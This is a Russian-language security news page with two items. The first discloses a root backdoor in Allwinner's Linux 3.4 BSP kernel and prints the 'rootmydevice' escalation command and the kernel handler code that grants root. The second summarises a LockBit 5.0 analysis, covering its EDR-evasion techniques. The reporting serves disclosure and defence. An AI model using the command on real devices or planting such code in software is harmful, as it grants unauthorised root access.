Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

   $ id
   uid=1000(user) gid=1000(user) 
   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
   $ id
   uid=0(root) gid=0(root) 

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno, пишет opennet.ru.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:

        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10. 

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Шифровальщик LockBit все еще жив и обрел загрузчик, позволяющий обойти EDR

Проведенный в Flashpoint анализ LockBit 5.0 подтвердил, что новая версия зловреда построена на базе v4.0. Шифровальщик также стал еще более скрытным из-за использования кастомного загрузчика и обрел деструктивные функции.

С выпуском LockBit 5.0 его развертывание стало осуществляться в два этапа: вначале загружается самостоятельный лоадер, обеспечивающий обход EDR, а затем — основной пейлоад, не утративший прежних функций.

Шифровальщик по-прежнему откатывает исполнение на машинах жителей стран СНГ, но стал обходить стороной также Филиппины. Записка с требованием выкупа (ReadMeForDecrypt.txt) содержит привычный текст, сохранилась даже опечатка в англоязычном слове «информация» — «inforTmation».

 

Для обхода EDR новый загрузчик LockBit использует технику process hollowing (для внедрения вредоноса в экземпляр defrag.exe), отвязку библиотек (повторно загружает с диска чистые NTDLL и Kernel32, перезаписывая в памяти хуки защитных решений), патчинг трассировки событий Windows, а также скрывает расширения файлов.

Изолированный от основного пейлоада зловред умеет распознавать вызовы API по хешам, перенаправлять поток исполнения на разрешенные вызовы API, динамически рассчитывать адреса перехода для обфускации потока управления.

Обновленный LockBit научился обрабатывать данные на локальных и сетевых дисках, в папках по выбору оператора, а также работать в многопоточном режиме с использованием XChaCha20.

Опциональные деструктивные функции позволяют зловреду шифровать файлы незаметно для жертвы — не меняя расширений и без вывода записки с требованием выкупа.

Результаты анализа показали, что грозный шифровальщик все еще актуален как угроза и даже продолжает развиваться — невзирая на попытки ликвидации инфраструктуры LockBit, взлом сайта RaaS (Ransomware-as-a-Service, вымогательский софт как услуга) и слив переписки в рамках LockBit-партнерки.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru